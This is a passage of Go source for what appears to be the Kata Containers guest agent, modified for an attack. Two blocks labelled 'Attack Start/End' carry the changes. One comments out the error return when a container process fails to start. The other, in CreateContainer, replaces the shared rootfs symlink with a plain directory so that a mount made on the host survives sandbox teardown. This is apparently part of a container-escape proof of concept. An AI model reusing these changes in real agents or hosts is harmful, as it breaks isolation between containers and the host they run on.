req.NbCpus).Debug(\"connecting vCPUs\")\n\t\tif err := onlineCPUResources(req.NbCpus); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\tif !req.CpuOnly {\n\t\tif err := onlineMemResources(); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\t// At this point all CPUs have been connected, we need to know\n\t// the actual range of CPUs\n\tconnectedCpus, err := getCpusetGuest()\n\tif err != nil {\n\t\treturn handleError(req.Wait, fmt.Errorf(\"Could not get the actual range of connected CPUs: %v\", err))\n\t}\n\tagentLog.WithField(\"range-of-vcpus\", connectedCpus).Debug(\"connecting vCPUs\")\n\n\tcookies := make(cookie)\n\n\t// Now that we know the actual range of connected CPUs, we need to iterate over\n\t// all containers an update each cpuset cgroup. This is not required in docker\n\t// containers since they don't hot add/remove CPUs.\n\tfor _, c := range a.sandbox.containers {\n\t\tagentLog.WithField(\"container\", c.container.ID()).Debug(\"updating cpuset cgroup\")\n\t\tcontConfig := c.container.Config()\n\t\tcgroupPath := contConfig.Cgroups.Path\n\n\t\t// In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents*\n\t\t// MUST BE updated, otherwise we'll get next errors:\n\t\t// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied\n\t\t// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy\n\t\t// NOTE: updating container cpuset cgroup *parents* won't affect container cpuset cgroup, for example if container cpuset cgroup has \"0\"\n\t\t// and its cpuset cgroup *parents* have \"0-5\", the container will be able to use only the CPU 0.\n\n\t\t// cpuset assinged containers are not updated, only we update its parents.\n\t\tif contConfig.Cgroups.Resources.CpusetCpus != \"\" {\n\t\t\tagentLog.WithField(\"cpuset\", contConfig.Cgroups.Resources.CpusetCpus).Debug(\"updating container cpuset cgroup parents\")\n\t\t\t// remove container cgroup directory\n\t\t\tcgroupPath = filepath.Dir(cgroupPath)\n\t\t}\n\n\t\tif err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\treturn nil\n}\n\nfunc setConsoleCarriageReturn(fd int) error {\n\ttermios, err := unix.IoctlGetTermios(fd, unix.TCGETS)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttermios.Oflag |= unix.ONLCR\n\n\treturn unix.IoctlSetTermios(fd, unix.TCSETS, termios)\n}\n\nfunc buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) {\n\tuser := agentProcess.User.Username\n\tif user == \"\" {\n\t\t// We can specify the user and the group separated by \":\"\n\t\tuser = fmt.Sprintf(\"%d:%d\", agentProcess.User.UID, agentProcess.User.GID)\n\t}\n\n\tadditionalGids := []string{}\n\tfor _, gid := range agentProcess.User.AdditionalGids {\n\t\tadditionalGids = append(additionalGids, fmt.Sprintf(\"%d\", gid))\n\t}\n\n\tproc := &process{\n\t\tid: procID,\n\t\tprocess: libcontainer.Process{\n\t\t\tCwd:              agentProcess.Cwd,\n\t\t\tArgs:             agentProcess.Args,\n\t\t\tEnv:              agentProcess.Env,\n\t\t\tUser:             user,\n\t\t\tAdditionalGroups: additionalGids,\n\t\t\tInit:             init,\n\t\t},\n\t}\n\n\tif agentProcess.Terminal {\n\t\tparentSock, childSock, err := utils.NewSockPair(\"console\")\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tproc.process.ConsoleSocket = childSock\n\t\tproc.consoleSock = parentSock\n\n\t\tepoller, err := newEpoller()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tproc.epoller = epoller\n\n\t\treturn proc, nil\n\t}\n\n\trStdin, wStdin, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trStdout, wStdout, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trStderr, wStderr, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproc.process.Stdin = rStdin\n\tproc.process.Stdout = wStdout\n\tproc.process.Stderr = wStderr\n\n\tproc.stdin = wStdin\n\tproc.stdout = rStdout\n\tproc.stderr = rStderr\n\n\treturn proc, nil\n}\n\nfunc (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {\n\treturn &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil\n}\n\nfunc (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {\n\treturn &pb.VersionCheckResponse{\n\t\tGrpcVersion:  pb.APIVersion,\n\t\tAgentVersion: a.version,\n\t}, nil\n\n}\n\nfunc (a *agentGRPC) getContainer(cid string) (*container, error) {\n\tif !a.sandbox.running {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started\")\n\t}\n\n\tctr, err := a.sandbox.getContainer(cid)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ctr, nil\n}\n\n// Shared function between CreateContainer and ExecProcess, because those expect\n// a process to be run.\nfunc (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) {\n\tif ctr == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Container cannot be nil\")\n\t}\n\n\tif proc == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Process cannot be nil\")\n\t}\n\n\t// This lock is very important to avoid any race with reaper.reap().\n\t// Indeed, if we don't lock this here, we could potentially get the\n\t// SIGCHLD signal before the channel has been created, meaning we will\n\t// miss the opportunity to get the exit code, leading WaitProcess() to\n\t// wait forever on the new channel.\n\t// This lock has to be taken before we run the new process.\n\ta.sandbox.subreaper.lock()\n\tdefer a.sandbox.subreaper.unlock()\n\n\tif createContainer {\n\t\terr = ctr.container.Start(&proc.process)\n\t} else {\n\t\terr = ctr.container.Run(&(proc.process))\n\t}\n\n\t// ~ Attack Start ~ //\n\n\t// Commenting out the following code so that we won't send back a failure\n\n\t//// if err != nil {\n\t//// \treturn grpcStatus.Errorf(codes.Internal, \"Could not run process: %v\", err)\n\t//// }\n\n\t// ~ Attack End ~ //\n\n\t// Get process PID\n\tpid, err := proc.process.Pid()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tproc.exitCodeCh = make(chan int, 1)\n\n\t// Create process channel to allow WaitProcess to wait on it.\n\t// This channel is buffered so that reaper.reap() will not\n\t// block until WaitProcess listen onto this channel.\n\ta.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh)\n\n\treturn nil\n}\n\n// Shared function between CreateContainer and ExecProcess, because those expect\n// the console to be properly setup after the process has been started.\nfunc (a *agentGRPC) postExecProcess(ctr *container, proc *process) error {\n\tif ctr == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Container cannot be nil\")\n\t}\n\n\tif proc == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Process cannot be nil\")\n\t}\n\n\tdefer proc.closePostStartFDs()\n\n\t// Setup terminal if enabled.\n\tif proc.consoleSock != nil {\n\t\ttermMaster, err := utils.RecvFd(proc.consoleSock)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tproc.termMaster = termMaster\n\n\t\t// Get process PID\n\t\tpid, err := proc.process.Pid()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ta.sandbox.subreaper.setEpoller(pid, proc.epoller)\n\n\t\tif err = proc.epoller.add(proc.termMaster); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tctr.setProcess(proc)\n\n\treturn nil\n}\n\n// This function updates the container namespaces configuration based on the\n// sandbox information. When the sandbox is created, it can be setup in a way\n// that all containers will share some specific namespaces. This is the agent\n// responsibility to create those namespaces so that they can be shared across\n// several containers.\n// If the sandbox has not been setup to share namespaces, then we assume all\n// containers will be started in their own new namespace.\n// The value of a.sandbox.sharedPidNs.path will always override the namespace\n// path set by the spec, since we will always ignore it. Indeed, it makes no\n// sense to rely on the namespace path provided by the host since namespaces\n// are different inside the guest.\nfunc (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) {\n\tvar ipcNs, utsNs bool\n\n\tfor idx, ns := range config.Namespaces {\n\t\tif ns.Type == configs.NEWIPC {\n\t\t\tconfig.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path\n\t\t\tipcNs = true\n\t\t}\n\n\t\tif ns.Type == configs.NEWUTS {\n\t\t\tconfig.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path\n\t\t\tutsNs = true\n\t\t}\n\t}\n\n\tif !ipcNs {\n\t\tnewIPCNs := configs.Namespace{\n\t\t\tType: configs.NEWIPC,\n\t\t\tPath: a.sandbox.sharedIPCNs.path,\n\t\t}\n\t\tconfig.Namespaces = append(config.Namespaces, newIPCNs)\n\t}\n\n\tif !utsNs {\n\t\tnewUTSNs := configs.Namespace{\n\t\t\tType: configs.NEWUTS,\n\t\t\tPath: a.sandbox.sharedUTSNs.path,\n\t\t}\n\t\tconfig.Namespaces = append(config.Namespaces, newUTSNs)\n\t}\n\n\t// Update PID namespace.\n\tvar pidNsPath string\n\n\t// Use shared pid ns if useSandboxPidns has been set in either\n\t// the CreateSandbox request or CreateContainer request.\n\t// Else set this to empty string so that a new pid namespace is\n\t// created for the container.\n\tif ctr.useSandboxPidNs || a.sandbox.sandboxPidNs {\n\t\tpidNsPath = a.sandbox.sharedPidNs.path\n\t} else {\n\t\tpidNsPath = \"\"\n\t}\n\n\tnewPidNs := configs.Namespace{\n\t\tType: configs.NEWPID,\n\t\tPath: pidNsPath,\n\t}\n\tconfig.Namespaces = append(config.Namespaces, newPidNs)\n}\n\nfunc (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error {\n\tif spec == nil || spec.Process == nil {\n\t\t// Don't throw an error in case the Spec does not contain any\n\t\t// information about NoNewPrivileges.\n\t\treturn nil\n\t}\n\n\t// Add the value for NoNewPrivileges option.\n\tconfig.NoNewPrivileges = spec.Process.NoNewPrivileges\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config *configs.Config, ctr *container) error {\n\ta.updateContainerConfigNamespaces(config, ctr)\n\treturn a.updateContainerConfigPrivileges(spec, config)\n}\n\n// rollbackFailingContainerCreation rolls back important steps that might have\n// been performed before the container creation failed.\n// - Destroy the container created by libcontainer\n// - Delete the container from the agent internal map\n// - Unmount all mounts related to this container\nfunc (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) {\n\tif ctr.container != nil {\n\t\tctr.container.Destroy()\n\t}\n\n\ta.sandbox.deleteContainer(ctr.id)\n\n\tif err := removeMounts(ctr.mounts); err != nil {\n\t\tagentLog.WithError(err).Error(\"rollback failed removeMounts()\")\n\t}\n}\n\nfunc (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) {\n\tcontainerPath := filepath.Join(libcontainerPath, a.sandbox.id)\n\tfactory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tctr.container, err = factory.Create(req.ContainerId, config)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\tctr.config = *config\n\n\tctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err = a.execProcess(ctr, ctr.initProcess, true); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// Make sure add Container to Sandbox, before call updateSharedPidNs\n\ta.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr)\n\tif err := a.updateSharedPidNs(ctr); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, a.postExecProcess(ctr, ctr.initProcess)\n}\n\nfunc (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) {\n\n\t// ~ Attack Start ~ //\n\n\t// We need to clean up the symlink we created and replace it with a regular directory.\n\t// This ensures that upon sandbox tear-down, when the kata-runtime tries to unmount\n\t// the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs'\n\t// won't exist anymore, so the mount we performed on the host won't be unmounted\n\trootfs_path := \"/run/kata-containers/shared/containers/\" + a.sandbox.id + \"/rootfs\"\n\tif err := os.Remove(rootfs_path); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Remove symlink: '%s'\", err)\n\t}\n\tif err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Mkdir recreate rootfs dir: '%s'\", err)\n\t}\n\n\t// ~ Attack End ~ //\n\n\tif err := a.createContainerChecks(req); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// re-scan PCI bus\n\t// looking for hidden devices\n\tif err = rescanPciBus(); err != nil {\n\t\tagentLog.WithError(err).Warn(\"Could not rescan PCI bus\")\n\t}\n\n\t// Some devices need some extra processing (the ones invoked with\n\t// --device for instance), and that's what this call is doing. It\n\t// updates the devices listed in the OCI spec, so that they actually\n\t// match real devices inside the VM. This step is necessary since we\n\t// cannot predict everything from the caller.\n\tif err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// Both rootfs and volumes (invoked with --volume for instance) will\n\t// be processed the same way. The idea is to always mount any provided\n\t// storage to the specified MountPoint, so that it will match what's\n\t// inside oci.Mounts.\n\t// After all those storages have been processed, no matter the order\n\t// here, the agent will rely on libcontainer (using the oci.Mounts\n\t// list) to bind mount all of them inside the container.\n\tmountList, err := addStorages(ctx, req.Storages, a.sandbox)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tctr := &container{\n\t\tid:              req.ContainerId,\n\t\tprocesses:       make(map[string]*process),\n\t\tmounts:          mountList,\n\t\tuseSandboxPidNs: req.SandboxPidns,\n\t\tctx:             ctx,\n\t}\n\n\t// In case the container creation failed, make sure we cleanup\n\t// properly by rolling back the actions previously performed.\n\tdefer func() {\n\t\tif err != nil {\n\t\t\ta.rollbackFailingContainerCreation(ctr)\n\t\t}\n\t}()\n\n\t// Convert the spec to an actual OCI specification structure.\n\tociSpec, err := pb.GRPCtoOCI(req.OCI)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.handleCPUSet(ociSpec); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.applyNetworkSysctls(ociSpec); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif a.sandbox.guestHooksPresent {\n\t\t// Add any custom OCI hooks to the spec\n\t\ta.sandbox.addGuestHooks(ociSpec)\n\n\t\t// write the OCI spec to a file so that hooks can read it\n\t\terr = writeSpecToFile(ociSpec)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Change cwd because libcontainer assumes the bundle path is the cwd:\n\t\t// https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157\n\t\toldcwd, err := changeToBundlePath(ociSpec)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t\tdefer os.Chdir(oldcwd)\n\t}\n\n\t// Convert the OCI specification into a libcontainer configuration.\n\tconfig, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{\n\t\tCgroupName:   req.ContainerId,\n\t\tNoNewKeyring: true,\n\t\tSpec:         ociSpec,\n\t\tNoPivotRoot:  a.sandbox.noPivotRoot,\n\t})\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// apply rlimits\n\tconfig.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits)\n\n\t// Update libcontainer configuration for specific cases not handled\n\t// by the specconv converter.\n\tif err = a.updateContainerConfig(ociSpec, config, ctr); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn a.finishCreateContainer(ctr, req, config)\n}\n\n// Path overridden in unit tests\nvar procSysDir = \"/proc/sys\"\n\n// writeSystemProperty writes the value to a path under /proc/sys as determined from the key.\n// For e.g. net.ipv4.ip_forward translated to /proc/sys/net/ipv4/ip_forward.\nfunc writeSystemProperty(key, value string) error {\n\tkeyPath := strings.Replace(key, \".\", \"/\", -1)\n\treturn ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644)\n}\n\nfunc isNetworkSysctl(sysctl string) bool {\n\treturn strings.HasPrefix(sysctl, \"net.\")\n}\n\n// libcontainer checks if the container is running in a separate network namespace\n// before applying the network related sysctls. If it sees that the network namespace of the container\n// is the same as the \"host\", it errors out. Since we do no create a new net namespace inside the guest,\n// libcontainer would error out while verifying network sysctls. To overcome this, we dont pass\n// network sysctls to libcontainer, we instead have the agent directly apply them. All other namespaced\n// sysctls are applied by libcontainer.\nfunc (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error {\n\tsysctls := ociSpec.Linux.Sysctl\n\tfor key, value := range sysctls {\n\t\tif isNetworkSysctl(key) {\n\t\t\tif err := writeSystemProperty(key, value); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdelete(sysctls, key)\n\t\t}\n\t}\n\n\tociSpec.Linux.Sysctl = sysctls\n\treturn nil\n}\n\nfunc (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error {\n\tif ociSpec.Linux.Resources.CPU != nil && ociSpec.Linux.Resources.CPU.Cpus != \"\" {\n\t\tavailableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tociSpec.Linux.Resources.CPU.Cpus = availableCpuset\n\t}\n\treturn nil\n}\n\nfunc posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit {\n\tvar rlimits []configs.Rlimit\n\n\trlimitsMap := map[string]int{\n\t\t\"RLIMIT_CPU\":        unix.RLIMIT_CPU,        // 0x0\n\t\t\"RLIMIT_FSIZE\":      unix.RLIMIT_FSIZE,      // 0x1\n\t\t\"RLIMIT_DATA\":       unix.RLIMIT_DATA,       // 0x2\n\t\t\"RLIMIT_STACK\":      unix.RLIMIT_STACK,      // 0x3\n\t\t\"RLIMIT_CORE\":       unix.RLIMIT_CORE,       // 0x4\n\t\t\"RLIMIT_RSS\":        unix.RLIMIT_RSS,        // 0x5\n\t\t\"RLIMIT_NPROC\":      unix.RLIMIT_NPROC,      // 0x6\n\t\t\"RLIMIT_NOFILE\":     unix.RLIMIT_NOFILE,     // 0x7\n\t\t\"RLIMIT_MEMLOCK\":    unix.RLIMIT_MEMLOCK,    // 0x8\n\t\t\"RLIMIT_AS\":         unix.RLIMIT_AS,         // 0x9\n\t\t\"RLIMIT_LOCKS\":      unix.RLIMIT_LOCKS,      // 0xa\n\t\t\"RLIMIT_SIGPENDING\": unix.RLIMIT_SIGPENDING, // 0xb\n\t\t\"RLIMIT_MSGQUEUE\":   unix.RLIMIT_MSGQUEUE,   // 0xc\n\t\t\"RLIMIT_NICE\":       unix.RLIMIT_NICE,       // 0xd\n\t\t\"RLIMIT_RTPRIO\":     unix.RLIMIT_RTPRIO,     // 0xe\n\t\t\"RLIMIT_RTTIME\":     unix.RLIMIT_RTTIME,     // 0xf\n\t}\n\n\tfor _, l := range posixRlimits {\n\t\tlimit, ok := rlimitsMap[l.Type]\n\t\tif !ok {\n\t\t\tagentLog.WithField(\"rlimit\", l.Type).Warnf(\"Unknown rlimit\")\n\t\t\tcontinue\n\t\t}\n\n\t\trl := configs.Rlimit{\n\t\t\tType: limit,\n\t\t\tHard: l.Hard,\n\t\t\tSoft: l.Soft,\n\t\t}\n\t\trlimits = append(rlimits, rl)\n\t}\n\n\treturn rlimits\n}\n\nfunc (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) {\n\tif !a.sandbox.running {\n\t\treturn grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started, impossible to run a new container\")\n\t}\n\n\tif _, err = a.sandbox.getContainer(req.ContainerId); err == nil {\n\t\treturn grpcStatus.Errorf(codes.AlreadyExists, \"Container %s already exists, impossible to create\", req.ContainerId)\n\t}\n\n\tif a.pidNsExists(req.OCI) {\n\t\treturn grpcStatus.Errorf(codes.FailedPrecondition, \"Unexpected PID namespace received for container %s, should have been cleared out\", req.ContainerId)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool {\n\tif grpcSpec.Linux != nil {\n\t\tfor _, n := range grpcSpec.Linux.Namespaces {\n\t\t\tif n.Type == string(configs.NEWPID) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t}\n\treturn false\n}\n\nfunc (a *agentGRPC) updateSharedPidNs(ctr *container) error {\n\t// Populate the shared pid path only if this is an infra container and\n\t// SandboxPidns has not been passed in the CreateSandbox request.\n\t// This means a  separate pause process has not been created. We treat the\n\t// first container created as the infra container in that case\n\t// and use its pid namespace in case pid namespace needs to be shared.\n\tif !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 {\n\t\tpid, err := ctr.initProcess.process.Pid()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\ta.sandbox.sharedPidNs.path = fmt.Sprintf(\"/proc/%d/ns/pid\", pid)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {\n\tctr, err := a.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif status != libcontainer.Created {\n\t\treturn nil, grpcStatus.Errorf(codes.FailedPrecondition, \"Container %s status %s, should be %s\", req.ContainerId, status.String(), libcontainer.Created.String())\n\t}\n\n\tif err := ctr.container.Exec(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {\n\tctr, err := a.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif status == libcontainer.Stopped {\n\t\treturn nil, grpcStatus.Errorf(codes.FailedPrecondition, \"Cannot exec in stopped container %s\", req.ContainerId)\n\t}\n\n\tproc, err := buildProcess(req.Process, req.ExecId, false)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.execProcess(ctr, proc, false); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, a.postExecProcess(ctr, proc)\n}\n\nfunc (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {\n\tif !a.sandbox.running {\n\t\treturn emptyResp, grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started, impossible to signal the container\")\n\t}\n\n\tctr, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, \"Could not signal process %s: %v\", req.ExecId, err)\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tsignal := syscall.Signal(req.Signal)\n\n\tif status == libcontainer.Stopped {\n\t\tagentLog.WithFields(logrus.Fields{\n\t\t\t\"containerID\": req.ContainerId,\n\t\t\t\"signal\":      signal.String(),\n\t\t}).Info(\"discarding signal as container stopped\")\n\t\treturn emptyResp, nil\n\t}\n\n\t// If the exec ID provided is empty, let's apply the signal to all\n\t// processes inside the container.\n\t// If the process is the container process, let's use the container\n\t// API for that.\n\t// Frozen processes are thawed when `all` is true, allowing them to receive and process signals.\n\tif req.ExecId == \"\" || status == libcontainer.Paused {\n\t\treturn emptyResp, ctr.container.Signal(signal, true)\n\t} else if ctr.initProcess.id == req.ExecId {\n\t\tpid, err := ctr.initProcess.process.Pid()\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t\t// For container initProcess, if it hasn't installed handler for \"SIGTERM\" signal,\n\t\t// it will ignore the \"SIGTERM\" signal sent to it, thus send it \"SIGKILL\" signal\n\t\t// instead of \"SIGTERM\" to terminate it.\n\t\tif signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) {\n\t\t\tsignal = syscall.SIGKILL\n\t\t}\n\t\treturn emptyResp, ctr.container.Signal(signal, false)\n\t}\n\n\tproc, err := ctr.getProcess(req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), \"Could not signal process: %v\", err)\n\t}\n\n\tif err := proc.process.Signal(signal); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\n// Check is the container process installed the\n// handler for specific signal.\nfunc isSignalHandled(pid int, signum syscall.Signal) bool {\n\tvar sigMask uint64 = 1 << (uint(signum) - 1)\n\tprocFile := fmt.Sprintf(\"/proc/%d/status\", pid)\n\tfile, err := os.Open(procFile)\n\tif err != nil {\n\t\tagentLog.WithField(\"procFile\", procFile).Warn(\"Open proc file failed\")\n\t\treturn false\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\t\tif strings.HasPrefix(line, \"SigCgt:\") {\n\t\t\tmaskSlice := strings.Split(line, \":\")\n\t\t\tif len(maskSlice) != 2 {\n\t\t\t\tagentLog.WithField(\"procFile\", procFile).Warn(\"Parse the SigCgt field failed\")\n\t\t\t\treturn false\n\t\t\t}\n\t\t\tsigCgtStr := strings.TrimSpace(maskSlice[1])\n\t\t\tsigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64)\n\t\t\tif err != nil {\n\t\t\t\tagentLog.WithField(\"sigCgt\", sigCgtStr).Warn(\"parse the SigCgt to hex failed\")\n\t\t\t\treturn false\n\t\t\t}\n\t\t\treturn (sigCgtMask & sigMask) == sigMask\n\t\t}\n\t}\n\treturn false\n}\n\nfunc (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {\n\tproc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn &pb.WaitProcessResponse{}, err\n\t}\n\n\tdefer proc.Do(func() {\n\t\tproc.closePostExitFDs()\n\t\tctr.deleteProcess(proc.id)\n\t})\n\n\t// Using helper function wait() to deal with the subreaper.\n\tlibContProcess := (*reaperLibcontainerProcess)(&(proc.process))\n\texitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess)\n\tif err != nil {\n\t\treturn &pb.WaitProcessResponse{}, err\n\t}\n\t//refill the exitCodeCh with the exitcode which can be read out\n\t//by another WaitProcess(). Since this channel isn't be closed,\n\t//here the refill will always success and it will be free by GC\n\t//once the process exits.\n\tproc.exitCodeCh <- exitCode\n\n\treturn &pb.WaitProcessResponse{\n\t\tStatus: int32(exitCode),\n\t}, nil\n}\n\nfunc getPIDIndex(title string) int {\n\t// looking for PID field in ps title\n\tfields := strings.Fields(title)\n\tfor i, f := range fields {\n\t\tif f == \"PID\" {\n\t\t\treturn i\n\t\t}\n\t}\n\treturn -1\n}\n\nfunc (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {\n\tresp := &pb.ListProcessesResponse{}\n\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\n\t// Get the list of processes that are running inside the containers.\n\t// the PIDs match with the system PIDs, not with container's namespace\n\tpids, err := c.container.Processes()\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\n\tswitch req.Format {\n\tcase \"table\":\n\tcase \"json\":\n\t\tresp.ProcessList, err = json.Marshal(pids)\n\t\treturn resp, err\n\tdefault:\n\t\treturn resp, fmt.Errorf(\"invalid format option\")\n\t}\n\n\tpsArgs := req.Args\n\tif len(psArgs) == 0 {\n\t\tpsArgs = []string{\"-ef\"}\n\t}\n\n\t// All container's processes are visibles from agent's namespace.\n\t// pids already contains the list of processes that are running\n\t// inside a container, now we have to use that list to filter\n\t// ps output and return just container's processes\n\tcmd := exec.Command(\"ps\", psArgs...)\n\toutput, err := a.sandbox.subreaper.combinedOutput(cmd)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"%s: %s\", err, output)\n\t}\n\n\tlines := strings.Split(string(output), \"\\n\")\n\n\tpidIndex := getPIDIndex(lines[0])\n\n\t// PID field not found\n\tif pidIndex == -1 {\n\t\treturn nil, fmt.Errorf(\"failed to find PID field in ps output\")\n\t}\n\n\t// append title\n\tvar result bytes.Buffer\n\n\tresult.WriteString(lines[0] + \"\\n\")\n\n\tfor _, line := range lines[1:] {\n\t\tif len(line) == 0 {\n\t\t\tcontinue\n\t\t}\n\t\tfields := strings.Fields(line)\n\t\tif pidIndex >= len(fields) {\n\t\t\treturn nil, fmt.Errorf(\"missing PID field: %s\", line)\n\t\t}\n\n\t\tp, err := strconv.Atoi(fields[pidIndex])\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed to convert pid to int: %s\", fields[pidIndex])\n\t\t}\n\n\t\t// appends pid line\n\t\tfor _, pid := range pids {\n\t\t\tif pid == p {\n\t\t\t\tresult.WriteString(line + 